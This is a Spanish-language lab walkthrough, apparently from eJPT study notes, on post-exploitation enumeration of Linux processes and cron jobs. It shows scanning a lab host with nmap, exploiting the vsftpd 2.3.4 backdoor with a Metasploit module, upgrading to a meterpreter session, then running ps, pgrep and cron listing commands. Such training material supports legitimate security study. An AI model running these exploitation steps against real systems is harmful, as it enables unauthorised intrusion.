> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/enumeracion-de-linux/enumeracion-de-procesos-y-tareas-cron.md).

# Enumeración de procesos y tareas cron

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/T713q88HDFjyqyb0BSLn" alt=""><figcaption></figcaption></figure>

**Paso 2:** Escaneo de puertos con Nmap.

Ahora que hemos identificado la dirección IP de destino, podemos realizar un escaneo de puertos para identificar los servicios vulnerables que se ejecutan en el sistema objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
nmap -sV demo.ine.local
```

<figure><img src="/files/DQ1CWVqI6NbecTSBOHbH" alt=""><figcaption></figcaption></figure>

El análisis de Nmap revela que el objetivo tiene un servidor FTP ejecutándose en el puerto 21. La columna de versión del análisis de Nmap revela que el servidor FTP es vsftpd 2.3.4. Esta versión de vsftpd es vulnerable a una vulnerabilidad de ejecución de comandos de puerta trasera y puede explotarse con un módulo de Metasploit.

**Paso 3:** Obtener acceso.

Ahora que hemos identificado el servicio vulnerable que se ejecuta en el objetivo, podemos iniciar la consola de Metasploit Framework (msfconsole) ejecutando el siguiente comando:

**Dominio:**

```
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS demo.ine.local
exploit
id
```

**Nota:** Si el exploit no funcionó en el primer intento, ejecútelo nuevamente.

<figure><img src="/files/cZ1Wxxm3UPN8v1aYzC2M" alt=""><figcaption></figcaption></figure>

También puede obtener una sesión de meterpreter en el sistema de destino actualizando la sesión del shell de comandos. Para ello, ejecute los siguientes comandos:

(Poner la sesión actual en segundo plano.)

**Comandos:**

```
CTRL + Z
sessions -u 1
sessions -i 2
```

<figure><img src="/files/26oCrdQrKyO9cZR3g5k6" alt=""><figcaption></figcaption></figure>

**Paso 4:** Enumerar procesos y trabajos cron.

Ahora que hemos obtenido acceso al sistema de destino y hemos obtenido una sesión de meterpreter, podemos comenzar a enumerar los procesos y trabajos cron que se ejecutan en el sistema de destino.

Podemos comenzar enumerando la lista de procesos que se están ejecutando en el sistema de destino, esto se puede hacer ejecutando el siguiente comando meterpreter:

**Dominio:**

```
ps
```

Como se muestra en la siguiente captura de pantalla, el comando mencionado anteriormente mostrará una lista de todos los procesos en ejecución y sus respectivos ID de proceso (PID).

<figure><img src="/files/rg1LAes3VdNaKEQDA9v4" alt=""><figcaption></figcaption></figure>

También podemos encontrar el PID de un servicio específico ejecutando el siguiente comando:

**Dominio:**

```
pgrep vsftpd
```

<figure><img src="/files/C3XQw611MPiuVpX4xOpv" alt=""><figcaption></figcaption></figure>

El sistema de destino no tiene la utilidad crontab instalada, por lo que deberá ejecutar los siguientes comandos en el sistema Kali Linux.

Podemos enumerar la lista de trabajos cron en el sistema Kali Linux ejecutando el siguiente comando:

**Dominio:**

```
ls -al /etc/cron*
```

<figure><img src="/files/XKHScfXzUMaz0fOZNiRu" alt=""><figcaption></figcaption></figure>

## Conclusión

En este laboratorio, aprendimos a enumerar la información de procesos y trabajos cron de un sistema de destino que ejecuta Linux.
